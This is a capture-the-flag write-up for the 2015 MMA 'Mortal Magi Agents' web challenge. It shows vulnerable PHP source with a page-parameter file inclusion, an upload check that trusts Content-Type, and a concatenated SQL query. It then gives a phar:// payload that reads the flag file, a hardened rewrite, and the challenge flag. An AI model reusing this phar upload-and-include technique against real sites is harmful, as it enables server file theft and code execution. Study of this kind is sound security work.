shpik's world!

[Web] Mortal Magi Agents - 300pts

0x400 CTF/0x401 MMA 1st 2015





This problem is vulnerable to local file inclusion (LFI).

Problem page (screenshot)

'index.php?page=settings' is the vulnerable point.

The file upload is on the settings page.

First I got the PHP source.

// home.php

// index.php

<?php
if (!isset($_GET["page"]) || isset($page))
    $page = "home";
else
    $page = $_GET["page"];   // user-controlled page name, later included: the LFI sink
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="favicon.ico">

    <title>Mortal Magi Agents</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="css/jumbotron.css" rel="stylesheet">

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src=""></script>
      <script src=""></script>
    <![endif]-->
  </head>

  <body>
    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="index.php">Mortal Magi Agents</a>
        </div>
        <div id="navbar" class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="?page=home">Home</a></li>
            <li><a href="?page=news">News</a></li>
            <li><a href="#contact">Contact</a></li>
          </ul>
<?php if (isset($_SESSION["user"])) { ?>
          <ul class="nav navbar-nav navbar-right">
            <li class='dropdown'>
              <a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button">
              <?php
              // the avatar path saved by settings.php is echoed back into the page
              if (isset($_SESSION["avator"])) {
                  echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">';
              }
              echo $_SESSION["user"];
              ?><span class='caret'></span></a>
              <ul class='dropdown-menu' role='menu'>
              <li><a href="?page=settings">Settings</a></li>
              <li><a href="logout.php">Sign out</a></li>
              </ul>
            </li>
          </ul>
<?php } else { ?>
          <form class="navbar-form navbar-right" action="login.php" method="post">
            <div class="form-group">
              <input type="text" placeholder="User" class="form-control" name="user">
            </div>
            <div class="form-group">
              <input type="password" placeholder="Password" class="form-control" name="password">
            </div>
            <button type="submit" class="btn btn-success" name="signin">Sign in</button>
            <button type="submit" class="btn btn-danger" name="signup">Sign up</button>
          </form>
<?php } ?>
        </div><!--/.nav-collapse -->
      </div>
    </nav>

    <!-- Main jumbotron for a primary marketing message or call to action -->
    <div class="jumbotron">
    <div class="container">
        <!-- the statement that includes the page selected by $page did not survive in the pasted source -->

        <p>Mortal Magi Agents 2015</p>
    </div> <!-- /container -->
    </div>

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src=""></script>
    <script src="js/bootstrap.min.js"></script>
  </body>
</html>

// settings.php
<?php
require "./db.php";
if (isset($_FILES["file"])) {
    // the extension is chosen from the client-supplied Content-Type only;
    // the file's actual contents are never inspected
    if ($_FILES['file']['type'] == "image/jpeg") {
        $ext = ".jpg";
    } else if ($_FILES['file']['type'] == "image/gif") {
        $ext = ".gif";
    } else if ($_FILES['file']['type'] == "image/png") {
        $ext = ".png";
    }
    $filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext;
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    $_SESSION["avator"] = $filename;
    $db = connect_db();
    $db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'");
}
?>
<div class="page-header"><h1>Settings</h1></div>
<?php if (isset($_SESSION["avator"])) { ?>
<img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64">
<?php } ?>
<h3>New avator</h3>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>

The uploaded file is saved as 'user' + sha1_file(uploaded file) + extension (see settings.php above).

But this name is no problem: the saved path is kept in $_SESSION['avator'] and echoed into the <img src> of the settings page, so it can be read straight from the response.

I used phar://. The uploaded file is a phar archive containing a PHP file with the following content, which the page parameter then includes:


<?php echo file_get_contents('../flag');?>
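As an added example (not the challenge's code, which is shown above), this is how the two weak spots would look after a fix: index.php resolving ?page= through an allowlist so no stream wrapper ever reaches include(), and settings.php deciding the extension from the bytes on disk instead of the client's Content-Type. The function names and the PAGES map are my own assumptions; the avators/ directory is the page's.

```php
<?php
// Added example, not the challenge source. Hardened counterparts of the
// index.php include and the settings.php upload handler discussed above.

// index.php: map ?page= through a fixed allowlist. The raw value is never used
// as a path, so phar:// (or any other wrapper) can never reach include().
const PAGES = ['home' => 'home.php', 'news' => 'news.php', 'settings' => 'settings.php'];

function resolve_page($requested): string
{
    $key = is_string($requested) ? $requested : 'home';   // arrays etc. fall back to home
    return PAGES[$key] ?? PAGES['home'];                   // unknown names fall back too
}

// settings.php: derive the extension from the actual image header, not from
// $_FILES['file']['type']. This alone is not sufficient, since a file that
// decodes as an image may still carry other data after the image bytes; the
// allowlist above is the decisive fix, this check only keeps junk out of avators/.
function validated_avatar_ext(string $tmp_path): ?string
{
    $info = @getimagesize($tmp_path);
    if ($info === false) {
        return null;                                        // not a decodable image
    }
    $allowed = [IMAGETYPE_JPEG => '.jpg', IMAGETYPE_GIF => '.gif', IMAGETYPE_PNG => '.png'];
    return $allowed[$info[2]] ?? null;                      // $info[2] is the IMAGETYPE_* constant
}

function store_avatar(array $file): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = validated_avatar_ext($file['tmp_name']);
    if ($ext === null) {
        return null;
    }
    // Random, unguessable name: nothing from the request or the session is used in the path.
    $name = bin2hex(random_bytes(16)) . $ext;
    if (!move_uploaded_file($file['tmp_name'], __DIR__ . '/avators/' . $name)) {
        return null;
    }
    return 'avators/' . $name;
}

// Wiring, in place of the original blocks:
//   include resolve_page($_GET['page'] ?? null);
//   $path = store_avatar($_FILES['file']);   // null means the upload was rejected
```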



Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
